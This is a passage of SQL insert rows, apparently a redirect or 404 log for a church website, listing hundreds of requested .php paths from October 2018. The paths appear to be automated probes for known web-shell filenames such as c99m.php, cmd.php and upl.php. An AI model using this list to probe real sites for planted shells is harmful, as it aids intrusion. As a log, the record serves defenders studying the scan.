(8889, 'https://www.lifeoasisinternationalchurch.org/m.php', NULL, '', '', 2, 0, '2018-10-05 12:55:42', '0000-00-00 00:00:00', 301),
(8890, 'https://www.lifeoasisinternationalchurch.org/n.php', NULL, '', '', 2, 0, '2018-10-05 13:05:03', '0000-00-00 00:00:00', 301),
(8891, 'https://www.lifeoasisinternationalchurch.org/p.php', NULL, '', '', 2, 0, '2018-10-05 13:14:19', '0000-00-00 00:00:00', 301),
(8892, 'https://www.lifeoasisinternationalchurch.org/q.php', NULL, '', '', 2, 0, '2018-10-05 13:23:37', '0000-00-00 00:00:00', 301),
(8893, 'https://www.lifeoasisinternationalchurch.org/r.php', NULL, '', '', 2, 0, '2018-10-05 13:32:59', '0000-00-00 00:00:00', 301),
(8894, 'https://www.lifeoasisinternationalchurch.org/s.php', NULL, '', '', 2, 0, '2018-10-05 13:42:15', '0000-00-00 00:00:00', 301),
(8895, 'https://www.lifeoasisinternationalchurch.org/t.php', NULL, '', '', 2, 0, '2018-10-05 13:51:33', '0000-00-00 00:00:00', 301),
(8896, 'https://www.lifeoasisinternationalchurch.org/u.php', NULL, '', '', 2, 0, '2018-10-05 14:00:51', '0000-00-00 00:00:00', 301),
(8897, 'https://www.lifeoasisinternationalchurch.org/w.php', NULL, '', '', 2, 0, '2018-10-05 14:10:12', '0000-00-00 00:00:00', 301),
(8898, 'https://www.lifeoasisinternationalchurch.org/z52.php', NULL, '', '', 1, 0, '2018-10-05 14:19:34', '0000-00-00 00:00:00', 301),
(8899, 'https://www.lifeoasisinternationalchurch.org/ac.php', NULL, '', '', 3, 0, '2018-10-05 14:28:57', '0000-00-00 00:00:00', 301),
(8900, 'https://www.lifeoasisinternationalchurch.org/aj.php', NULL, '', '', 3, 0, '2018-10-05 14:38:25', '0000-00-00 00:00:00', 301),
(8901, 'https://www.lifeoasisinternationalchurch.org/an.php', NULL, '', '', 3, 0, '2018-10-05 14:47:49', '0000-00-00 00:00:00', 301),
(8902, 'https://www.lifeoasisinternationalchurch.org/as.php', NULL, '', '', 3, 0, '2018-10-05 14:57:15', '0000-00-00 00:00:00', 301),
(8903, 'https://lifeoasisinternationalchurch.org/guest house', NULL, '', '', 1, 0, '2018-10-05 15:02:00', '0000-00-00 00:00:00', 301),
(8904, 'https://lifeoasisinternationalchurch.org/parakletos', NULL, '', '', 1, 0, '2018-10-05 15:02:17', '0000-00-00 00:00:00', 301),
(8905, 'https://www.lifeoasisinternationalchurch.org/ay.php', NULL, '', '', 3, 0, '2018-10-05 15:06:41', '0000-00-00 00:00:00', 301),
(8906, 'https://www.lifeoasisinternationalchurch.org/az.php', NULL, '', '', 2, 0, '2018-10-05 15:16:09', '0000-00-00 00:00:00', 301),
(8907, 'https://www.lifeoasisinternationalchurch.org/b3.php', NULL, '', '', 1, 0, '2018-10-05 15:25:32', '0000-00-00 00:00:00', 301),
(8908, 'https://www.lifeoasisinternationalchurch.org/ba.php', NULL, '', '', 3, 0, '2018-10-05 15:34:52', '0000-00-00 00:00:00', 301),
(8909, 'https://www.lifeoasisinternationalchurch.org/c0.php', NULL, '', '', 1, 0, '2018-10-05 15:44:12', '0000-00-00 00:00:00', 301),
(8910, 'https://www.lifeoasisinternationalchurch.org/c9.php', NULL, '', '', 1, 0, '2018-10-05 15:53:33', '0000-00-00 00:00:00', 301),
(8911, 'https://www.lifeoasisinternationalchurch.org/ca.php', NULL, '', '', 2, 0, '2018-10-05 16:02:53', '0000-00-00 00:00:00', 301),
(8912, 'https://www.lifeoasisinternationalchurch.org/cg.php', NULL, '', '', 3, 0, '2018-10-05 16:12:25', '0000-00-00 00:00:00', 301),
(8913, 'https://www.lifeoasisinternationalchurch.org/cm.php', NULL, '', '', 2, 0, '2018-10-05 16:21:52', '0000-00-00 00:00:00', 301),
(8914, 'https://www.lifeoasisinternationalchurch.org/cp.php', NULL, '', '', 2, 0, '2018-10-05 16:31:17', '0000-00-00 00:00:00', 301),
(8915, 'https://www.lifeoasisinternationalchurch.org/cr.php', NULL, '', '', 3, 0, '2018-10-05 16:40:34', '0000-00-00 00:00:00', 301),
(8916, 'https://www.lifeoasisinternationalchurch.org/cy.php', NULL, '', '', 3, 0, '2018-10-05 16:50:00', '0000-00-00 00:00:00', 301),
(8917, 'https://www.lifeoasisinternationalchurch.org/dc.php', NULL, '', '', 3, 0, '2018-10-05 16:59:24', '0000-00-00 00:00:00', 301),
(8918, 'https://www.lifeoasisinternationalchurch.org/di.php', NULL, '', '', 3, 0, '2018-10-05 17:08:46', '0000-00-00 00:00:00', 301),
(8919, 'https://www.lifeoasisinternationalchurch.org/dt.php', NULL, '', '', 3, 0, '2018-10-05 17:18:08', '0000-00-00 00:00:00', 301),
(8920, 'https://www.lifeoasisinternationalchurch.org/er.php', NULL, '', '', 3, 0, '2018-10-05 17:27:33', '0000-00-00 00:00:00', 301),
(8921, 'https://www.lifeoasisinternationalchurch.org/ex.php', NULL, '', '', 2, 0, '2018-10-05 17:38:04', '0000-00-00 00:00:00', 301),
(8922, 'https://www.lifeoasisinternationalchurch.org/fa.php', NULL, '', '', 3, 0, '2018-10-05 17:48:17', '0000-00-00 00:00:00', 301),
(8923, 'https://www.lifeoasisinternationalchurch.org/ft.php', NULL, '', '', 3, 0, '2018-10-05 17:57:44', '0000-00-00 00:00:00', 301),
(8924, 'https://www.lifeoasisinternationalchurch.org/g0.php', NULL, '', '', 1, 0, '2018-10-05 18:07:04', '0000-00-00 00:00:00', 301),
(8925, 'https://www.lifeoasisinternationalchurch.org/ga.php', NULL, '', '', 3, 0, '2018-10-05 18:16:22', '0000-00-00 00:00:00', 301),
(8926, 'https://www.lifeoasisinternationalchurch.org/gf.php', NULL, '', '', 3, 0, '2018-10-05 18:25:47', '0000-00-00 00:00:00', 301),
(8927, 'https://www.lifeoasisinternationalchurch.org/gr.php', NULL, '', '', 3, 0, '2018-10-05 18:35:13', '0000-00-00 00:00:00', 301),
(8928, 'https://www.lifeoasisinternationalchurch.org/h4.php', NULL, '', '', 1, 0, '2018-10-05 18:44:26', '0000-00-00 00:00:00', 301),
(8929, 'https://www.lifeoasisinternationalchurch.org/hi.php', NULL, '', '', 3, 0, '2018-10-05 18:53:45', '0000-00-00 00:00:00', 301),
(8930, 'https://www.lifeoasisinternationalchurch.org/in.php', NULL, '', '', 3, 0, '2018-10-05 19:03:04', '0000-00-00 00:00:00', 301),
(8931, 'https://www.lifeoasisinternationalchurch.org/ir.php', NULL, '', '', 3, 0, '2018-10-05 19:12:25', '0000-00-00 00:00:00', 301),
(8932, 'https://www.lifeoasisinternationalchurch.org/js.php', NULL, '', '', 3, 0, '2018-10-05 19:21:56', '0000-00-00 00:00:00', 301),
(8933, 'https://www.lifeoasisinternationalchurch.org/kl.php', NULL, '', '', 3, 0, '2018-10-05 19:31:22', '0000-00-00 00:00:00', 301),
(8934, 'https://www.lifeoasisinternationalchurch.org/kr.php', NULL, '', '', 3, 0, '2018-10-05 19:40:49', '0000-00-00 00:00:00', 301),
(8935, 'https://www.lifeoasisinternationalchurch.org/lo.php', NULL, '', '', 3, 0, '2018-10-05 20:00:35', '0000-00-00 00:00:00', 301),
(8936, 'https://www.lifeoasisinternationalchurch.org/ma.php', NULL, '', '', 2, 0, '2018-10-05 20:08:53', '0000-00-00 00:00:00', 301),
(8937, 'https://www.lifeoasisinternationalchurch.org/me.php', NULL, '', '', 3, 0, '2018-10-05 20:18:09', '0000-00-00 00:00:00', 301),
(8938, 'https://www.lifeoasisinternationalchurch.org/mo.php', NULL, '', '', 3, 0, '2018-10-05 20:27:28', '0000-00-00 00:00:00', 301),
(8939, 'https://www.lifeoasisinternationalchurch.org/my.php', NULL, '', '', 3, 0, '2018-10-05 20:36:50', '0000-00-00 00:00:00', 301),
(8940, 'https://www.lifeoasisinternationalchurch.org/traing', NULL, '', '', 1, 0, '2018-10-05 20:37:57', '0000-00-00 00:00:00', 301),
(8941, 'https://www.lifeoasisinternationalchurch.org/nc.php', NULL, '', '', 3, 0, '2018-10-05 20:46:17', '0000-00-00 00:00:00', 301),
(8942, 'https://www.lifeoasisinternationalchurch.org/ng.php', NULL, '', '', 2, 0, '2018-10-05 20:55:43', '0000-00-00 00:00:00', 301),
(8943, 'https://www.lifeoasisinternationalchurch.org/no.php', NULL, '', '', 3, 0, '2018-10-05 21:05:08', '0000-00-00 00:00:00', 301),
(8944, 'https://www.lifeoasisinternationalchurch.org/ns.php', NULL, '', '', 2, 0, '2018-10-05 21:14:32', '0000-00-00 00:00:00', 301),
(8945, 'https://www.lifeoasisinternationalchurch.org/nt.php', NULL, '', '', 3, 0, '2018-10-05 21:23:59', '0000-00-00 00:00:00', 301),
(8946, 'https://www.lifeoasisinternationalchurch.org/pr.php', NULL, '', '', 3, 0, '2018-10-05 21:33:17', '0000-00-00 00:00:00', 301),
(8947, 'https://www.lifeoasisinternationalchurch.org/pw.php', NULL, '', '', 3, 0, '2018-10-05 21:42:41', '0000-00-00 00:00:00', 301),
(8948, 'https://www.lifeoasisinternationalchurch.org/qs.php', NULL, '', '', 3, 0, '2018-10-05 21:52:12', '0000-00-00 00:00:00', 301),
(8949, 'https://www.lifeoasisinternationalchurch.org/re.php', NULL, '', '', 3, 0, '2018-10-05 22:01:35', '0000-00-00 00:00:00', 301),
(8950, 'https://www.lifeoasisinternationalchurch.org/ro.php', NULL, '', '', 3, 0, '2018-10-05 22:10:52', '0000-00-00 00:00:00', 301),
(8951, 'https://www.lifeoasisinternationalchurch.org/ru.php', NULL, '', '', 2, 0, '2018-10-05 22:20:18', '0000-00-00 00:00:00', 301),
(8952, 'https://www.lifeoasisinternationalchurch.org/s7.php', NULL, '', '', 1, 0, '2018-10-05 22:29:34', '0000-00-00 00:00:00', 301),
(8953, 'https://www.lifeoasisinternationalchurch.org/sa.php', NULL, '', '', 3, 0, '2018-10-05 22:38:49', '0000-00-00 00:00:00', 301),
(8954, 'https://www.lifeoasisinternationalchurch.org/si.php', NULL, '', '', 3, 0, '2018-10-05 22:48:09', '0000-00-00 00:00:00', 301),
(8955, 'https://www.lifeoasisinternationalchurch.org/lifestreaming/training', NULL, '', '', 1, 0, '2018-10-05 22:53:23', '0000-00-00 00:00:00', 301),
(8956, 'https://www.lifeoasisinternationalchurch.org/sm.php', NULL, '', '', 3, 0, '2018-10-05 22:57:29', '0000-00-00 00:00:00', 301),
(8957, 'https://www.lifeoasisinternationalchurch.org/so.php', NULL, '', '', 3, 0, '2018-10-05 23:06:49', '0000-00-00 00:00:00', 301),
(8958, 'https://www.lifeoasisinternationalchurch.org/sp.php', NULL, '', '', 3, 0, '2018-10-05 23:16:09', '0000-00-00 00:00:00', 301),
(8959, 'https://www.lifeoasisinternationalchurch.org/st.php', NULL, '', '', 3, 0, '2018-10-05 23:25:25', '0000-00-00 00:00:00', 301),
(8960, 'https://www.lifeoasisinternationalchurch.org/to.php', NULL, '', '', 3, 0, '2018-10-05 23:34:43', '0000-00-00 00:00:00', 301),
(8961, 'https://www.lifeoasisinternationalchurch.org/tr.php', NULL, '', '', 3, 0, '2018-10-05 23:44:00', '0000-00-00 00:00:00', 301),
(8962, 'https://www.lifeoasisinternationalchurch.org/we.php', NULL, '', '', 3, 0, '2018-10-06 00:02:43', '0000-00-00 00:00:00', 301),
(8963, 'https://www.lifeoasisinternationalchurch.org/wi.php', NULL, '', '', 3, 0, '2018-10-06 00:12:03', '0000-00-00 00:00:00', 301),
(8964, 'https://www.lifeoasisinternationalchurch.org/wo.php', NULL, '', '', 3, 0, '2018-10-06 00:21:24', '0000-00-00 00:00:00', 301),
(8965, 'https://www.lifeoasisinternationalchurch.org/ws.php', NULL, '', '', 3, 0, '2018-10-06 00:30:48', '0000-00-00 00:00:00', 301),
(8966, 'https://www.lifeoasisinternationalchurch.org/za.php', NULL, '', '', 3, 0, '2018-10-06 00:40:14', '0000-00-00 00:00:00', 301),
(8967, 'https://www.lifeoasisinternationalchurch.org/ze.php', NULL, '', '', 3, 0, '2018-10-06 00:49:40', '0000-00-00 00:00:00', 301),
(8968, 'https://www.lifeoasisinternationalchurch.org/zy529.php', NULL, '', '', 1, 0, '2018-10-06 00:59:09', '0000-00-00 00:00:00', 301),
(8969, 'https://www.lifeoasisinternationalchurch.org/acc.php', NULL, '', '', 1, 0, '2018-10-06 01:08:34', '0000-00-00 00:00:00', 301),
(8970, 'https://www.lifeoasisinternationalchurch.org/aja.php', NULL, '', '', 1, 0, '2018-10-06 01:18:00', '0000-00-00 00:00:00', 301),
(8971, 'https://www.lifeoasisinternationalchurch.org/ant.php', NULL, '', '', 1, 0, '2018-10-06 01:27:25', '0000-00-00 00:00:00', 301),
(8972, 'https://www.lifeoasisinternationalchurch.org/asp.php', NULL, '', '', 1, 0, '2018-10-06 01:36:49', '0000-00-00 00:00:00', 301),
(8973, 'https://www.lifeoasisinternationalchurch.org/ayy.php', NULL, '', '', 1, 0, '2018-10-06 01:46:18', '0000-00-00 00:00:00', 301),
(8974, 'https://www.lifeoasisinternationalchurch.org/azr.php', NULL, '', '', 1, 0, '2018-10-06 01:55:52', '0000-00-00 00:00:00', 301),
(8975, 'https://www.lifeoasisinternationalchurch.org/b37.php', NULL, '', '', 1, 0, '2018-10-06 02:05:15', '0000-00-00 00:00:00', 301),
(8976, 'https://www.lifeoasisinternationalchurch.org/bac.php', NULL, '', '', 1, 0, '2018-10-06 02:14:39', '0000-00-00 00:00:00', 301),
(8977, 'https://www.lifeoasisinternationalchurch.org/c0d.php', NULL, '', '', 1, 0, '2018-10-06 02:24:06', '0000-00-00 00:00:00', 301),
(8978, 'https://www.lifeoasisinternationalchurch.org/cas.php', NULL, '', '', 1, 0, '2018-10-06 02:33:36', '0000-00-00 00:00:00', 301),
(8979, 'https://www.lifeoasisinternationalchurch.org/cgi.php', NULL, '', '', 1, 0, '2018-10-06 02:43:09', '0000-00-00 00:00:00', 301),
(8980, 'https://www.lifeoasisinternationalchurch.org/cmd.php', NULL, '', '', 1, 0, '2018-10-06 02:52:44', '0000-00-00 00:00:00', 301),
(8981, 'https://www.lifeoasisinternationalchurch.org/cpa.php', NULL, '', '', 1, 0, '2018-10-06 03:02:18', '0000-00-00 00:00:00', 301),
(8982, 'https://www.lifeoasisinternationalchurch.org/cry.php', NULL, '', '', 1, 0, '2018-10-06 03:11:49', '0000-00-00 00:00:00', 301),
(8983, 'https://www.lifeoasisinternationalchurch.org/cyb.php', NULL, '', '', 1, 0, '2018-10-06 03:21:15', '0000-00-00 00:00:00', 301),
(8984, 'https://www.lifeoasisinternationalchurch.org/div.php', NULL, '', '', 1, 0, '2018-10-06 03:30:41', '0000-00-00 00:00:00', 301),
(8985, 'https://www.lifeoasisinternationalchurch.org/dto.php', NULL, '', '', 1, 0, '2018-10-06 03:40:10', '0000-00-00 00:00:00', 301),
(8986, 'https://www.lifeoasisinternationalchurch.org/ern.php', NULL, '', '', 1, 0, '2018-10-06 03:49:41', '0000-00-00 00:00:00', 301),
(8987, 'https://www.lifeoasisinternationalchurch.org/ex0.php', NULL, '', '', 1, 0, '2018-10-06 03:59:05', '0000-00-00 00:00:00', 301),
(8988, 'https://www.lifeoasisinternationalchurch.org/fat.php', NULL, '', '', 1, 0, '2018-10-06 04:08:28', '0000-00-00 00:00:00', 301),
(8989, 'https://www.lifeoasisinternationalchurch.org/ftp.php', NULL, '', '', 1, 0, '2018-10-06 04:17:57', '0000-00-00 00:00:00', 301),
(8990, 'https://www.lifeoasisinternationalchurch.org/g00.php', NULL, '', '', 1, 0, '2018-10-06 04:27:12', '0000-00-00 00:00:00', 301),
(8991, 'https://www.lifeoasisinternationalchurch.org/gam.php', NULL, '', '', 1, 0, '2018-10-06 04:36:31', '0000-00-00 00:00:00', 301),
(8992, 'https://www.lifeoasisinternationalchurch.org/h4n.php', NULL, '', '', 1, 0, '2018-10-06 04:46:00', '0000-00-00 00:00:00', 301),
(8993, 'https://www.lifeoasisinternationalchurch.org/hid.php', NULL, '', '', 1, 0, '2018-10-06 04:55:31', '0000-00-00 00:00:00', 301),
(8994, 'https://www.lifeoasisinternationalchurch.org/ind.php', NULL, '', '', 1, 0, '2018-10-06 05:05:00', '0000-00-00 00:00:00', 301),
(8995, 'https://www.lifeoasisinternationalchurch.org/iro.php', NULL, '', '', 1, 0, '2018-10-06 05:14:27', '0000-00-00 00:00:00', 301),
(8996, 'https://www.lifeoasisinternationalchurch.org/jsp.php', NULL, '', '', 1, 0, '2018-10-06 05:24:05', '0000-00-00 00:00:00', 301),
(8997, 'https://www.lifeoasisinternationalchurch.org/kad.php', NULL, '', '', 1, 0, '2018-10-06 05:33:39', '0000-00-00 00:00:00', 301),
(8998, 'https://www.lifeoasisinternationalchurch.org/kla.php', NULL, '', '', 1, 0, '2018-10-06 05:43:15', '0000-00-00 00:00:00', 301),
(8999, 'https://www.lifeoasisinternationalchurch.org/resources/lprivate streaming', NULL, '', '', 1, 0, '2018-10-06 05:50:11', '0000-00-00 00:00:00', 301),
(9000, 'https://www.lifeoasisinternationalchurch.org/ru2.php', NULL, '', '', 1, 0, '2018-10-06 06:05:19', '0000-00-00 00:00:00', 301),
(9001, 'https://www.lifeoasisinternationalchurch.org/saf.php', NULL, '', '', 1, 0, '2018-10-06 06:13:10', '0000-00-00 00:00:00', 301),
(9002, 'https://www.lifeoasisinternationalchurch.org/sim.php', NULL, '', '', 1, 0, '2018-10-06 06:20:52', '0000-00-00 00:00:00', 301),
(9003, 'https://www.lifeoasisinternationalchurch.org/sin.php', NULL, '', '', 1, 0, '2018-10-06 06:28:43', '0000-00-00 00:00:00', 301),
(9004, 'https://www.lifeoasisinternationalchurch.org/sma.php', NULL, '', '', 1, 0, '2018-10-06 06:36:42', '0000-00-00 00:00:00', 301),
(9005, 'https://www.lifeoasisinternationalchurch.org/sol.php', NULL, '', '', 1, 0, '2018-10-06 06:44:52', '0000-00-00 00:00:00', 301),
(9006, 'https://www.lifeoasisinternationalchurch.org/sos.php', NULL, '', '', 1, 0, '2018-10-06 06:52:28', '0000-00-00 00:00:00', 301),
(9007, 'https://www.lifeoasisinternationalchurch.org/spy.php', NULL, '', '', 1, 0, '2018-10-06 07:00:11', '0000-00-00 00:00:00', 301),
(9008, 'https://www.lifeoasisinternationalchurch.org/stn.php', NULL, '', '', 1, 0, '2018-10-06 07:07:48', '0000-00-00 00:00:00', 301),
(9009, 'https://www.lifeoasisinternationalchurch.org/str.php', NULL, '', '', 1, 0, '2018-10-06 07:15:24', '0000-00-00 00:00:00', 301),
(9010, 'https://www.lifeoasisinternationalchurch.org/too.php', NULL, '', '', 1, 0, '2018-10-06 07:22:52', '0000-00-00 00:00:00', 301),
(9011, 'https://www.lifeoasisinternationalchurch.org/try.php', NULL, '', '', 1, 0, '2018-10-06 07:30:17', '0000-00-00 00:00:00', 301),
(9012, 'https://www.lifeoasisinternationalchurch.org/upl.php', NULL, '', '', 2, 0, '2018-10-06 07:37:40', '0000-00-00 00:00:00', 301),
(9013, 'https://www.lifeoasisinternationalchurch.org/win.php', NULL, '', '', 1, 0, '2018-10-06 07:45:09', '0000-00-00 00:00:00', 301),
(9014, 'https://www.lifeoasisinternationalchurch.org/wor.php', NULL, '', '', 1, 0, '2018-10-06 07:52:32', '0000-00-00 00:00:00', 301),
(9015, 'https://www.lifeoasisinternationalchurch.org/zac.php', NULL, '', '', 1, 0, '2018-10-06 07:59:55', '0000-00-00 00:00:00', 301),
(9016, 'https://www.lifeoasisinternationalchurch.org/zeh.php', NULL, '', '', 1, 0, '2018-10-06 08:07:27', '0000-00-00 00:00:00', 301),
(9017, 'https://www.lifeoasisinternationalchurch.org/zykacce.php', NULL, '', '', 1, 0, '2018-10-06 08:14:57', '0000-00-00 00:00:00', 301),
(9018, 'https://www.lifeoasisinternationalchurch.org/anti.php', NULL, '', '', 1, 0, '2018-10-06 08:22:27', '0000-00-00 00:00:00', 301),
(9019, 'https://www.lifeoasisinternationalchurch.org/aspy.php', NULL, '', '', 1, 0, '2018-10-06 08:29:58', '0000-00-00 00:00:00', 301),
(9020, 'https://www.lifeoasisinternationalchurch.org/ayyi.php', NULL, '', '', 1, 0, '2018-10-06 08:37:27', '0000-00-00 00:00:00', 301),
(9021, 'https://www.lifeoasisinternationalchurch.org/azra.php', NULL, '', '', 1, 0, '2018-10-06 08:44:52', '0000-00-00 00:00:00', 301),
(9022, 'https://www.lifeoasisinternationalchurch.org/b374.php', NULL, '', '', 1, 0, '2018-10-06 08:52:20', '0000-00-00 00:00:00', 301),
(9023, 'https://www.lifeoasisinternationalchurch.org/back.php', NULL, '', '', 1, 0, '2018-10-06 09:00:00', '0000-00-00 00:00:00', 301),
(9024, 'https://www.lifeoasisinternationalchurch.org/c0de.php', NULL, '', '', 1, 0, '2018-10-06 09:07:47', '0000-00-00 00:00:00', 301),
(9025, 'https://www.lifeoasisinternationalchurch.org/c99m.php', NULL, '', '', 1, 0, '2018-10-06 09:15:33', '0000-00-00 00:00:00', 301),
(9026, 'https://www.lifeoasisinternationalchurch.org/casu.php', NULL, '', '', 1, 0, '2018-10-06 09:23:03', '0000-00-00 00:00:00', 301),
(9027, 'https://www.lifeoasisinternationalchurch.org/cgit.php', NULL, '', '', 1, 0, '2018-10-06 09:30:28', '0000-00-00 00:00:00', 301),
(9028, 'https://www.lifeoasisinternationalchurch.org/cmda.php', NULL, '', '', 1, 0, '2018-10-06 09:37:47', '0000-00-00 00:00:00', 301),
(9029, 'https://www.lifeoasisinternationalchurch.org/cpan.php', NULL, '', '', 1, 0, '2018-10-06 09:45:14', '0000-00-00 00:00:00', 301),
(9030, 'https://www.lifeoasisinternationalchurch.org/crys.php', NULL, '', '', 1, 0, '2018-10-06 09:52:36', '0000-00-00 00:00:00', 301),
(9031, 'https://www.lifeoasisinternationalchurch.org/cybe.php', NULL, '', '', 1, 0, '2018-10-06 09:59:45', '0000-00-00 00:00:00', 301),
(9032, 'https://www.lifeoasisinternationalchurch.org/dtoo.php', NULL, '', '', 1, 0, '2018-10-06 10:07:06', '0000-00-00 00:00:00', 301),
(9033, 'https://www.lifeoasisinternationalchurch.org/ex0s.php', NULL, '', '', 1, 0, '2018-10-06 10:14:22', '0000-00-00 00:00:00', 301),
(9034, 'https://www.lifeoasisinternationalchurch.org/fata.php', NULL, '', '', 1, 0, '2018-10-06 10:21:40', '0000-00-00 00:00:00', 301),
(9035, 'https://www.lifeoasisinternationalchurch.org/ftps.php', NULL, '', '', 1, 0, '2018-10-06 10:28:55', '0000-00-00 00:00:00', 301),
(9036, 'https://www.lifeoasisinternationalchurch.org/g00n.php', NULL, '', '', 1, 0, '2018-10-06 10:36:16', '0000-00-00 00:00:00', 301),
(9037, 'https://www.lifeoasisinternationalchurch.org/gamm.php', NULL, '', '', 1, 0, '2018-10-06 10:43:42', '0000-00-00 00:00:00', 301),
(9038, 'https://www.lifeoasisinternationalchurch.org/h4nt.php', NULL, '', '', 1, 0, '2018-10-06 10:51:09', '0000-00-00 00:00:00', 301),
(9039, 'https://www.lifeoasisinternationalchurch.org/hidd.php', NULL, '', '', 1, 0, '2018-10-06 10:58:30', '0000-00-00 00:00:00', 301),
(9040, 'https://www.lifeoasisinternationalchurch.org/inde.php', NULL, '', '', 1, 0, '2018-10-06 11:05:50', '0000-00-00 00:00:00', 301),
(9041, 'https://www.lifeoasisinternationalchurch.org/iron.php', NULL, '', '', 1, 0, '2018-10-06 11:13:06', '0000-00-00 00:00:00', 301),
(9042, 'https://www.lifeoasisinternationalchurch.org/jspw.php', NULL, '', '', 1, 0, '2018-10-06 11:20:20', '0000-00-00 00:00:00', 301),
(9043, 'https://www.lifeoasisinternationalchurch.org/kado.php', NULL, '', '', 1, 0, '2018-10-06 11:27:32', '0000-00-00 00:00:00', 301),
(9044, 'https://www.lifeoasisinternationalchurch.org/klas.php', NULL, '', '', 1, 0, '2018-10-06 11:34:43', '0000-00-00 00:00:00', 301),
(9045, 'https://www.lifeoasisinternationalchurch.org/lama.php', NULL, '', '', 1, 0, '2018-10-06 11:41:57', '0000-00-00 00:00:00', 301),
(9046, 'https://www.lifeoasisinternationalchurch.org/lifk.php', NULL, '', '', 1, 0, '2018-10-06 11:49:15', '0000-00-00 00:00:00', 301),
(9047, 'https://www.lifeoasisinternationalchurch.org/liz0.php', NULL, '', '', 1, 0, '2018-10-06 11:56:32', '0000-00-00 00:00:00', 301),
(9048, 'https://www.lifeoasisinternationalchurch.org/loli.php', NULL, '', '', 1, 0, '2018-10-06 12:03:44', '0000-00-00 00:00:00', 301),
(9049, 'https://www.lifeoasisinternationalchurch.org/lost.php', NULL, '', '', 1, 0, '2018-10-06 12:11:18', '0000-00-00 00:00:00', 301),
(9050, 'https://www.lifeoasisinternationalchurch.org/mack.php', NULL, '', '', 1, 0, '2018-10-06 12:18:52', '0000-00-00 00:00:00', 301),
(9051, 'https://www.lifeoasisinternationalchurch.org/mata.php', NULL, '', '', 1, 0, '2018-10-06 12:27:34', '0000-00-00 00:00:00', 301),
(9052, 'https://www.lifeoasisinternationalchurch.org/mega.php', NULL, '', '', 1, 0, '2018-10-06 12:36:33', '0000-00-00 00:00:00', 301),
(9053, 'https://www.lifeoasisinternationalchurch.org/moro.php', NULL, '', '', 1, 0, '2018-10-06 12:43:53', '0000-00-00 00:00:00', 301),
(9054, 'https://www.lifeoasisinternationalchurch.org/mysh.php', NULL, '', '', 1, 0, '2018-10-06 12:51:15', '0000-00-00 00:00:00', 301),
(9055, 'https://www.lifeoasisinternationalchurch.org/mysq.php', NULL, '', '', 1, 0, '2018-10-06 12:58:33', '0000-00-00 00:00:00', 301),
(9056, 'https://www.lifeoasisinternationalchurch.org/nshe.php', NULL, '', '', 1, 0, '2018-10-06 13:05:53', '0000-00-00 00:00:00', 301),
(9057, 'https://www.lifeoasisinternationalchurch.org/ntda.php', NULL, '', '', 1, 0, '2018-10-06 13:13:20', '0000-00-00 00:00:00', 301),
(9058, 'https://www.lifeoasisinternationalchurch.org/phan.php', NULL, '', '', 1, 0, '2018-10-06 13:20:34', '0000-00-00 00:00:00', 301),
(9059, 'https://www.lifeoasisinternationalchurch.org/phpi.php', NULL, '', '', 1, 0, '2018-10-06 13:27:53', '0000-00-00 00:00:00', 301),
(9060, 'https://www.lifeoasisinternationalchurch.org/phpr.php', NULL, '', '', 1, 0, '2018-10-06 13:35:10', '0000-00-00 00:00:00', 301),
(9061, 'https://www.lifeoasisinternationalchurch.org/phps.php', NULL, '', '', 1, 0, '2018-10-06 13:42:27', '0000-00-00 00:00:00', 301),
(9062, 'https://www.lifeoasisinternationalchurch.org/phva.php', NULL, '', '', 1, 0, '2018-10-06 13:49:44', '0000-00-00 00:00:00', 301),
(9063, 'https://www.lifeoasisinternationalchurch.org/pred.php', NULL, '', '', 1, 0, '2018-10-06 13:56:58', '0000-00-00 00:00:00', 301),
(9064, 'https://www.lifeoasisinternationalchurch.org/read.php', NULL, '', '', 1, 0, '2018-10-06 14:04:16', '0000-00-00 00:00:00', 301),
(9065, 'https://www.lifeoasisinternationalchurch.org/reme.php', NULL, '', '', 1, 0, '2018-10-06 14:11:39', '0000-00-00 00:00:00', 301),
(9066, 'https://www.lifeoasisinternationalchurch.org/robo.php', NULL, '', '', 1, 0, '2018-10-06 14:18:59', '0000-00-00 00:00:00', 301),
(9067, 'https://www.lifeoasisinternationalchurch.org/root.php', NULL, '', '', 1, 0, '2018-10-06 14:26:15', '0000-00-00 00:00:00', 301),
(9068, 'https://www.lifeoasisinternationalchurch.org/sima.php', NULL, '', '', 1, 0, '2018-10-06 14:33:35', '0000-00-00 00:00:00', 301),
(9069, 'https://www.lifeoasisinternationalchurch.org/simp.php', NULL, '', '', 1, 0, '2018-10-06 14:41:06', '0000-00-00 00:00:00', 301),
(9070, 'https://www.lifeoasisinternationalchurch.org/sims.php', NULL, '', '', 1, 0, '2018-10-06 14:48:24', '0000-00-00 00:00:00', 301),
(9071, 'https://www.lifeoasisinternationalchurch.org/sinc.php', NULL, '', '', 1, 0, '2018-10-06 14:55:48', '0000-00-00 00:00:00', 301),
(9072, 'https://www.lifeoasisinternationalchurch.org/smal.php', NULL, '', '', 1, 0, '2018-10-06 15:03:04', '0000-00-00 00:00:00', 301),
(9073, 'https://www.lifeoasisinternationalchurch.org/sold.php', NULL, '', '', 1, 0, '2018-10-06 15:10:25', '0000-00-00 00:00:00', 301),
(9074, 'https://www.lifeoasisinternationalchurch.org/sosy.php', NULL, '', '', 1, 0, '2018-10-06 15:17:39', '0000-00-00 00:00:00', 301),
(9075, 'https://www.lifeoasisinternationalchurch.org/spyg.php', NULL, '', '', 1, 0, '2018-10-06 15:24:52', '0000-00-00 00:00:00', 301),
(9076, 'https://www.lifeoasisinternationalchurch.org/stre.php', NULL, '', '', 1, 0, '2018-10-06 15:32:02', '0000-00-00 00:00:00', 301),
(9077, 'https://www.lifeoasisinternationalchurch.org/tool.php', NULL, '', '', 1, 0, '2018-10-06 15:39:16', '0000-00-00 00:00:00', 301),
(9078, 'https://www.lifeoasisinternationalchurch.org/trya.php', NULL, '', '', 1, 0, '2018-10-06 15:46:25', '0000-00-00 00:00:00', 301),
(9079, 'https://www.lifeoasisinternationalchurch.org/uplo.php', NULL, '', '', 1, 0, '2018-10-06 15:53:41', '0000-00-00 00:00:00', 301),
(9080, 'https://www.lifeoasisinternationalchurch.org/wors.php', NULL, '', '', 1, 0, '2018-10-06 16:00:58', '0000-00-00 00:00:00', 301),
(9081, 'https://www.lifeoasisinternationalchurch.org/zehi.php', NULL, '', '', 1, 0, '2018-10-06 16:08:21', '0000-00-00 00:00:00', 301),
(9082, 'https://www.lifeoasisinternationalchurch.org/zykl.php', NULL, '', '', 1, 0, '2018-10-06 16:15:44', '0000-00-00 00:00:00', 301),
